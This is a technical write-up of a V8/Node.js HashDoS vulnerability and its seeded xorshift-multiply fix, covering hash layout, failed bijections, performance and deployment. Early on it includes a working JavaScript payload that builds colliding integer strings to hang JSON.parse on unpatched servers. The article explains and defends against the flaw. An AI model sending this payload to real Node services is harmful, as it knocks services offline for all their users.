The Hash That Has to Undo Itself: V8's Array Index HashDoS Problem

HashDoS is not a new problem. Scott Crosby and Dan Wallach described the attack in 2003: hash tables promise O(1) average-case lookup, but an attacker who can force every key into the same bucket turns insertion of N items into O(N²) work. The 2011 disclosure coordinated by Alexander Klink and Julian Wälde turned this into a real-world crisis, demonstrating that a single HTTP request with carefully crafted POST parameter names could pin server CPUs across PHP, Python, Ruby, Java, and dozens of other platforms.

Most languages responded the same way: seed the hash function with a random secret at startup. Python added PYTHONHASHSEED randomization in 3.3. Perl followed in 5.18. Ruby switched to a seeded variant and later SipHash. Rust ships std::collections::HashMap with SipHash-1-3 seeded from thread-local randomness by default. The principle is simple enough: if the attacker cannot predict the hash value of a given key, they cannot construct a set of keys that all land in the same bucket.

V8 followed this path too, adopting a seeded rapidhash for regular string keys. But a gap remained, and that gap was patched in the March 2026 Node.js security release as CVE-2026-21717. The affected versions span Node.js 20 through 25; fixes landed in v20.20.2, v22.22.2, v24.14.1, and v25.8.2.

The gap exists because of a design choice that predates the security concern by years. Every string in V8 carries a 32-bit raw_hash_field. For ordinary strings, bits 2 through 31 hold the seeded rapidhash output. For array index strings, the layout is different:

"1234" (length=4, value=1234, type: kIntegerIndex = 0b00):
 +--------+--------------------------+---+
 | 000100 | 000000000000010011010010 |0 0|
 | length |      numeric value       |   |
 +--------+--------------------------+---+
 31     26 25                       2 1  0

Array index strings are strings that look like valid JavaScript array indices: "0", "42", "1234", any canonical non-negative integer up to 2³²-2, the largest valid array index. V8 special-cases them so that integer extraction, typed array indexing, and element access can skip character-by-character parsing and read the value directly from the hash field (in practice, for short strings whose value fits in the 24-bit field shown above). When code evaluates arr["42"] or calls parseInt on an already-interned integer string, V8 extracts the number with a shift and a mask rather than looping over digits. That field is doing two jobs at once: it is both the hash used for table lookup and the stored representation of the integer.
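To make the double duty concrete, here is a minimal C++ sketch that packs and unpacks a hash field using the bit positions from the diagram above. The constants and helper names (MakeIntegerIndexField, CachedValue, CachedLength, InitialSlot) are hypothetical illustrations, not V8's own accessors, and InitialSlot assumes the table indexes with the field's two type bits shifted off.

```cpp
#include <cassert>
#include <cstdint>

// Field layout read off the diagram above (illustrative constants, not V8's):
// bits 0-1 field type, bits 2-25 the 24-bit value, bits 26-31 the length.
constexpr uint32_t kTypeBits = 2;
constexpr uint32_t kValueBits = 24;
constexpr uint32_t kValueMask = (1u << kValueBits) - 1;
constexpr uint32_t kIntegerIndexType = 0b00;

// Hypothetical helper: pack a cached array index and its digit count.
uint32_t MakeIntegerIndexField(uint32_t value, uint32_t length) {
  return (length << (kTypeBits + kValueBits)) |
         ((value & kValueMask) << kTypeBits) | kIntegerIndexType;
}

// The fast path: one shift and one mask, no digit parsing.
uint32_t CachedValue(uint32_t field) {
  return (field >> kTypeBits) & kValueMask;
}

uint32_t CachedLength(uint32_t field) {
  return field >> (kTypeBits + kValueBits);
}

// What a power-of-two table sees: the field without its type bits, reduced
// to a slot. For capacities up to 2^24 the length bits drop out entirely.
uint32_t InitialSlot(uint32_t field, uint32_t capacity_log2) {
  return (field >> kTypeBits) & ((1u << capacity_log2) - 1);
}
```

With this layout, CachedValue(0x10001348) recovers 1234 without touching any characters, and InitialSlot returns 1234 for both "1234" and "525522" (1234 + 2¹⁹) in a 2¹⁹-slot table, even though their lengths differ.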

The consequence for security is that, before this fix, an attacker could predict the hash of any array index string exactly. V8’s string table uses open addressing with quadratic probing, where the initial slot is hash & (capacity - 1) and hash is the field with its two type bits shifted off. With typical table capacities below 2²⁴, the length bits are masked away as well, so the slot depends only on value mod capacity. Finding a chain of collisions requires nothing more than arithmetic:

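const payload = [];
const val = 1234;     // target value: every lookup of "1234" walks the chain
const MOD = 2 ** 19;  // assumed string table capacity (a power of two)
const CHN = 2 ** 17;  // chain length
const REP = 2 ** 17;  // repetitions of the target value

// The first string (1234 + 2**19) shares 1234's home slot but is a different
// value. Each later string sits on the next slot of 1234's probe sequence
// (+1, +2, +3, ...), so the chain keeps growing.
let j = val + MOD;
for (let i = 1; i < CHN; i++) {
  payload.push(`${j}`);
  j = (j + i) % MOD;
}
// Every occurrence of "1234" now has to walk past the whole chain.
for (let k = 0; k < REP; k++) {
  payload.push(`${val}`);
}

// ~2 MB payload causes ~30 seconds hang in JSON.parse()
const string = JSON.stringify({ data: payload });
JSON.parse(string);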

JSON parsing is the easiest trigger. When JSON.parse encounters a string value, it internalizes it into V8’s string table. An object with many distinct integer-string keys, or a large array of integer-like string values such as the payload above, forces repeated interned string lookups through an artificially long collision chain. About two megabytes of JSON input produced roughly thirty seconds of CPU hang in testing.
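The cost behind the payload can be reproduced in a small model. The sketch below is hypothetical and deliberately simplified: it is not V8’s StringTable, stores plain integers instead of strings, uses the value itself as the hash, and assumes the probe sequence advances by +1, +2, +3, ... from the initial slot, which is the pattern the payload’s j = (j + i) % MOD follows. ProbesForTarget replays the payload on a small table and counts the slots one lookup of the target has to visit.

```cpp
#include <cassert>
#include <cstdint>
#include <vector>

constexpr uint32_t kEmptySlot = 0xFFFFFFFFu;

// Hypothetical model, not V8's StringTable: plain integer keys, the value
// itself as the hash, and probes at slot, slot+1, slot+1+2, slot+1+2+3, ...
class ProbeModel {
 public:
  explicit ProbeModel(uint32_t capacity_log2)
      : mask_((1u << capacity_log2) - 1), slots_(mask_ + 1, kEmptySlot) {}

  // Looks up `value`, inserting it if absent; returns the number of slots
  // visited. Terminates as long as the table is not full.
  uint32_t FindOrInsert(uint32_t value) {
    uint32_t slot = value & mask_;  // initial slot: hash & (capacity - 1)
    for (uint32_t step = 1;; ++step) {
      if (slots_[slot] == kEmptySlot) {
        slots_[slot] = value;
        return step;
      }
      if (slots_[slot] == value) return step;
      slot = (slot + step) & mask_;  // triangular increments: +1, +2, +3, ...
    }
  }

 private:
  uint32_t mask_;
  std::vector<uint32_t> slots_;
};

// Replays the payload pattern: chain_len - 1 decoy values laid along the
// probe sequence of `target`, then one lookup of `target` itself.
uint32_t ProbesForTarget(uint32_t capacity_log2, uint32_t target,
                         uint32_t chain_len) {
  ProbeModel table(capacity_log2);
  const uint32_t mod = 1u << capacity_log2;
  uint32_t j = target + mod;  // same home slot as target, different value
  for (uint32_t i = 1; i < chain_len; ++i) {
    table.FindOrInsert(j);
    j = (j + i) % mod;
  }
  return table.FindOrInsert(target);
}
```

In this model an ordinary lookup costs one probe, while a lookup of the target after CHN - 1 decoys costs CHN probes. With the payload’s CHN = REP = 2¹⁷, the repeated lookups add up to roughly 2³⁴ probe steps.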

Why the Standard Fix Does Not Apply

The obvious response is to seed the array index hash the same way regular strings are seeded. The problem is reversibility. In the languages above, the hash is used only to find the bucket: the table entry also keeps the original key (Python’s dict stores the key object, Rust’s HashMap stores the key) for comparison and retrieval, so nothing ever has to recover a key from its hash.

V8’s array index string hash is not like that. The numeric value IS the hash, reconstructed from the hash field at every point where V8 needs an integer from an integer-like string. If you replace the stored value with a one-way hash of it, you lose the fast integer extraction path. Every string-keyed element access such as arr["42"] would fall back to parsing characters, and the performance regression would reach ordinary JavaScript workloads, not just the security-sensitive ones.

The fix must use a bijection: a function that maps each 24-bit integer to a unique 24-bit output, seeded with a random key, and invertible by any code that holds the same key. The constraint rules out SipHash, SHA-anything, MurmurHash in its standard form, and every other non-invertible design.
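The bijection requirement is easy to check mechanically because the domain is small. This brute-force sketch (IsPermutation24 is a hypothetical helper) tests whether a candidate function maps the 2²⁴ possible values one-to-one onto themselves; a function that passes can in principle be inverted, and one that fails cannot.

```cpp
#include <cassert>
#include <cstdint>
#include <vector>

constexpr uint32_t kDomainSize = 1u << 24;
constexpr uint32_t kMask24 = kDomainSize - 1;

// Returns true if f maps [0, 2^24) onto itself with no two inputs sharing an
// output, i.e. f is a permutation of the 24-bit value space. Brute force is
// affordable because the domain has only 2^24 points.
template <typename F>
bool IsPermutation24(F f) {
  std::vector<bool> seen(kDomainSize, false);
  for (uint32_t x = 0; x < kDomainSize; ++x) {
    const uint32_t y = f(x);
    if (y > kMask24 || seen[y]) return false;  // out of range or a collision
    seen[y] = true;
  }
  return true;
}
```

XOR with a constant and multiplication by an odd constant modulo 2²⁴ both pass; multiplying by 2 or shifting right does not. A one-way hash truncated to 24 bits would also fail: a random-looking function on 2²⁴ points leaves about 1/e, roughly 37%, of its outputs unused.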

Why Naive Bijections Fail

The two simplest invertible operations over a fixed-width integer space both fall short for different reasons.

XOR with a secret, hash = value ^ secret, is perfectly invertible (just XOR again), but it has no diffusion at all. Each output bit depends on exactly one input bit. An attacker who wants values that agree in the low k bits of the output just needs values that agree in the low k bits of value XOR secret, which means agreeing in the low k bits of value since the secret is constant. Collisions at any table capacity are trivial to construct.

A linear congruential step, hash = (m * value + c) & mask with odd m, is also bijective, but it is linear over the integers modulo 2^N. Low output bits depend only on low input bits, because multiplication carries propagate upward and never downward. An attacker targeting a table of capacity 32768 (2¹⁵) therefore only needs values whose low 15 bits are equal: their low 15 output bits are then equal too, so they collide for every choice of the secret multiplier m and offset c.
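The following sketch makes both failures concrete. XorSeed, LcgSeed, and Slot are hypothetical helpers implementing the two naive constructions on 24-bit values, and the constants in the note below are arbitrary. Two values that agree in their low 15 bits land in the same slot of a 2¹⁵-entry table under both constructions, whichever secret, multiplier, or offset is chosen, so the attacker never needs to learn the secret.

```cpp
#include <cassert>
#include <cstdint>

constexpr uint32_t kMask24 = (1u << 24) - 1;

// Naive seeded bijection 1: XOR with a secret.
uint32_t XorSeed(uint32_t value, uint32_t secret) {
  return (value ^ secret) & kMask24;
}

// Naive seeded bijection 2: a linear congruential step (m must be odd).
uint32_t LcgSeed(uint32_t value, uint32_t m, uint32_t c) {
  return (m * value + c) & kMask24;  // uint32_t wraparound keeps the low bits
}

// Initial slot in a power-of-two table with 2^capacity_log2 entries.
uint32_t Slot(uint32_t hash, uint32_t capacity_log2) {
  return hash & ((1u << capacity_log2) - 1);
}
```

For instance, 1234 and 1234 + 2¹⁵ = 34002 share a slot under XorSeed with secret 0xABCDEF and under LcgSeed with m = 0x9E3779 and c = 0x7F4A7C, and they would for any other choice as well.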

Both fail for the same underlying reason: they do not satisfy the Strict Avalanche Criterion. Flipping one input bit should flip each output bit with probability 0.5. Neither XOR-only nor multiply-only transformations come close to that.
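The criterion can be measured directly. In this sketch, MaxAvalancheBias is a hypothetical helper, and its worst-case-deviation score is a simpler metric than the bias score cited in the statistical analysis later on. It flips each input bit of random 24-bit inputs and records how often each output bit changes; NaiveXor and NaiveLcg use arbitrary example constants.

```cpp
#include <cassert>
#include <cmath>
#include <cstdint>
#include <random>

constexpr uint32_t kBits = 24;
constexpr uint32_t kMask24 = (1u << kBits) - 1;

// The two naive bijections, with arbitrary example constants.
uint32_t NaiveXor(uint32_t x) { return (x ^ 0x5A5A5Au) & kMask24; }
uint32_t NaiveLcg(uint32_t x) { return (0x9E3779u * x + 7u) & kMask24; }

// For each (input bit i, output bit j), estimate how often flipping bit i of
// a random input flips bit j of the output, and return the largest deviation
// from the ideal probability 0.5 (0 is ideal, 0.5 is the worst possible).
template <typename F>
double MaxAvalancheBias(F f, uint32_t samples = 1u << 12) {
  uint32_t flips[kBits][kBits] = {};
  std::mt19937 rng(12345);  // fixed seed so the estimate is reproducible
  for (uint32_t s = 0; s < samples; ++s) {
    const uint32_t x = static_cast<uint32_t>(rng()) & kMask24;
    const uint32_t fx = f(x);
    for (uint32_t i = 0; i < kBits; ++i) {
      const uint32_t diff = fx ^ f(x ^ (1u << i));
      for (uint32_t j = 0; j < kBits; ++j) flips[i][j] += (diff >> j) & 1u;
    }
  }
  double worst = 0.0;
  for (uint32_t i = 0; i < kBits; ++i) {
    for (uint32_t j = 0; j < kBits; ++j) {
      const double p = static_cast<double>(flips[i][j]) / samples;
      worst = std::fmax(worst, std::fabs(p - 0.5));
    }
  }
  return worst;
}
```

Both naive bijections score exactly 0.5, the worst possible value. Under XOR, flipping input bit i changes only output bit i. Under the LCG, flipping bit 23 changes only output bit 23, because adding an odd multiple of 2²³ modulo 2²⁴ touches nothing below it.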

The Xorshift-Multiply Solution

The fix developed by Joyee Cheung (Igalia, sponsored by Bloomberg) combines two operations from different algebraic structures, which is the key insight behind the mixing steps in hash functions like MurmurHash and xxHash. A right-shift XOR, x ^= x >> k, is nonlinear over the integers but purely linear over GF(2), and it propagates information from high bits to low bits. Multiplication by an odd constant is nonlinear over GF(2) but linear over the integers modulo 2^N, and its carries propagate information from low bits to high bits. Alternating these two directions of propagation produces diffusion that neither alone can achieve.
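The algebraic claim can be checked with a few concrete values. In this sketch the helper names are hypothetical and 0x9E3779 is an arbitrary odd constant, not one of V8’s multipliers. The xorshift preserves XOR but not addition, and the odd multiply preserves addition modulo 2²⁴ but not XOR, so a composition of the two is, in general, linear in neither sense.

```cpp
#include <cassert>
#include <cstdint>

constexpr uint32_t kMask24 = (1u << 24) - 1;
constexpr uint32_t kOddMultiplier = 0x9E3779u;  // arbitrary odd example constant

uint32_t XorShift12(uint32_t x) { return (x ^ (x >> 12)) & kMask24; }
uint32_t MulOdd(uint32_t x) { return (x * kOddMultiplier) & kMask24; }

// True if f preserves XOR for this pair: f(a ^ b) == f(a) ^ f(b).
template <typename F>
bool PreservesXor(F f, uint32_t a, uint32_t b) {
  return f(a ^ b) == (f(a) ^ f(b));
}

// True if f preserves addition mod 2^24 for this pair: f(a + b) == f(a) + f(b).
template <typename F>
bool PreservesAdd(F f, uint32_t a, uint32_t b) {
  return f((a + b) & kMask24) == ((f(a) + f(b)) & kMask24);
}
```

XorShift12 preserves XOR for every pair but fails addition at a = 2¹², b = 1 (f(4097) = 4096, while f(4096) + f(1) = 4098). MulOdd preserves addition for every pair but fails XOR at a = 1, b = 2.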

The implementation uses three rounds over 24-bit values, with odd multipliers derived from the same random secrets V8 already generates at startup for rapidhash:

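#include <cstdint>

constexpr uint32_t kMask = (1u << 24) - 1;  // 24-bit value field
constexpr uint32_t kShift = 12;             // half the bit width

// Forward mix: three rounds of (xorshift, odd multiply), then a final xorshift.
uint32_t SeedArrayIndexValue(uint32_t value, const uint32_t m[3]) {
  uint32_t x = value;
  x ^= x >> kShift; x = (x * m[0]) & kMask; // round 1
  x ^= x >> kShift; x = (x * m[1]) & kMask; // round 2
  x ^= x >> kShift; x = (x * m[2]) & kMask; // round 3
  x ^= x >> kShift;                          // finalize
  return x;
}

// Inverse: the same steps in reverse order. Each xorshift undoes itself, and
// each multiply is undone by the multiplier's inverse modulo 2^24.
uint32_t UnseedArrayIndexValue(uint32_t hash, const uint32_t m_inv[3]) {
  uint32_t x = hash;
  x ^= x >> kShift; x = (x * m_inv[2]) & kMask; // undo finalize, round 3 multiply
  x ^= x >> kShift; x = (x * m_inv[1]) & kMask; // undo round 3 shift, round 2 multiply
  x ^= x >> kShift; x = (x * m_inv[0]) & kMask; // undo round 2 shift, round 1 multiply
  x ^= x >> kShift;                              // undo round 1 shift
  return x;
}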

Each xorshift step is its own inverse: with k equal to half the bit width, applying x ^= x >> 12 twice gives x ^ (x >> 24), and x >> 24 is zero for any 24-bit value, so the unseed path reuses the same xorshift and only needs inverted multipliers. The modular inverses of the multipliers are computed once at startup using Newton’s method and stored in the HashSeed structure alongside the multipliers. Inversion is four xors, four shifts, three multiplies, and three masks: more work than extracting a raw stored integer, but competitive with character-by-character integer parsing for strings longer than four digits.
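The inverse multipliers and the round trip can be sketched in a few lines. This is a minimal C++ illustration following the structure of the code above; ArrayIndexSeed, MakeSeed, InverseMod2_24, Seed, Unseed, and RoundTripsAll are hypothetical names, and the example multipliers are arbitrary constants rather than V8’s startup-derived ones. Because the domain has only 2²⁴ values, the round trip can be checked exhaustively.

```cpp
#include <cassert>
#include <cstdint>

constexpr uint32_t kMask = (1u << 24) - 1;
constexpr uint32_t kShift = 12;

// Inverse of an odd m modulo 2^24 via Newton's iteration y <- y * (2 - m * y).
// Starting from y = m is already correct to 3 bits (odd squares are 1 mod 8),
// and each step doubles the correct low bits: 3 -> 6 -> 12 -> 24.
uint32_t InverseMod2_24(uint32_t m) {
  uint32_t y = m;
  for (int i = 0; i < 3; ++i) y *= 2u - m * y;  // unsigned wraparound is fine
  return y & kMask;
}

// Hypothetical stand-in for the multipliers and inverses kept in HashSeed.
struct ArrayIndexSeed {
  uint32_t m[3];
  uint32_t m_inv[3];
};

ArrayIndexSeed MakeSeed(uint32_t m0, uint32_t m1, uint32_t m2) {
  // Force each multiplier into 24 bits and make it odd, hence invertible.
  ArrayIndexSeed s{{(m0 & kMask) | 1u, (m1 & kMask) | 1u, (m2 & kMask) | 1u},
                   {0, 0, 0}};
  for (int i = 0; i < 3; ++i) {
    s.m_inv[i] = InverseMod2_24(s.m[i]);
    assert(((s.m[i] * s.m_inv[i]) & kMask) == 1u);  // sanity check
  }
  return s;
}

uint32_t Seed(uint32_t value, const ArrayIndexSeed& s) {
  uint32_t x = value & kMask;
  for (int r = 0; r < 3; ++r) {
    x ^= x >> kShift;
    x = (x * s.m[r]) & kMask;
  }
  return x ^ (x >> kShift);
}

// Reverse order: each xorshift is its own inverse, and each multiply is
// undone by the corresponding inverse multiplier.
uint32_t Unseed(uint32_t hash, const ArrayIndexSeed& s) {
  uint32_t x = hash & kMask;
  for (int r = 2; r >= 0; --r) {
    x ^= x >> kShift;
    x = (x * s.m_inv[r]) & kMask;
  }
  return x ^ (x >> kShift);
}

// Exhaustive check over every 24-bit value.
bool RoundTripsAll(const ArrayIndexSeed& s) {
  for (uint32_t v = 0; v <= kMask; ++v) {
    if (Unseed(Seed(v, s), s) != v) return false;
  }
  return true;
}
```

Only three Newton steps are needed for 24 bits, which is why computing the inverses once at startup is cheap. MakeSeed(0x9E3779, 0x85EBCB, 0xC2B2AE), for example, turns the even third constant into 0xC2B2AF before inverting it.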

Two rounds are not enough. Statistical testing across many randomly sampled multiplier pairs showed that the bias of a 2-round construction varies widely, with some pairs producing bias scores as high as 40 on a scale where 0 is ideal. Three rounds bring the mean bias to around 0.5 with a standard deviation of 0.2, which is stable enough that a randomly drawn set of three multipliers is very unlikely to produce a weak hash. This analysis draws on methodology from Chris Wellons’ hash-prospector project, which searches for low-bias integer hash constructions in the same xorshift-multiply family.

Performance

The concern with any change to V8’s hot paths is measurable regression across benchmarks that represent real workloads. The patch was tested against SunSpider, Kraken, Octane, and JetStream 3, and the results on all four were within measurement noise; for example, Kraken showed +0.2%, Octane -0.1%, and JetStream 3 -0.15%. On these benchmarks, the change is performance-neutral in practice.

This holds because the seeded decode path, though more expensive than a raw bit-field extraction, is rarely the bottleneck in real programs. Integer strings are one input pattern among many, and the absolute cost of four xors and three multiplies is small relative to the surrounding work.

Scope and Deployment

The fix is enabled in Node.js via a V8 build flag (v8_enable_seeded_array_index_hash), but deliberately disabled in Chrome. The asymmetry is intentional: in a browser, a HashDoS attack can hang one tab, which the user can close. On a server running Node.js, one crafted HTTP request can saturate the event loop thread and stall the entire process for all concurrent users. The performance trade-off is worth making in one context and not the other.

Deno and Cloudflare Workers were notified during the coordinated disclosure and are coordinating their own deployments. The analysis repository documents the statistical testing used to validate the construction.

The broader lesson from this patch is that security constraints and performance constraints do not always point in the same direction, but they are not always in conflict either. The array index hash field in V8 was an optimization: skip parsing, read the value from the hash. That optimization created a security gap that could not be closed with the techniques that worked everywhere else. The solution required finding a construction that satisfied both constraints simultaneously, which took careful analysis of diffusion properties, algebraic structure, and performance cost. The original advisory from Joyee Cheung is one of the more thorough write-ups of this kind of constraint negotiation that has appeared in a public security disclosure.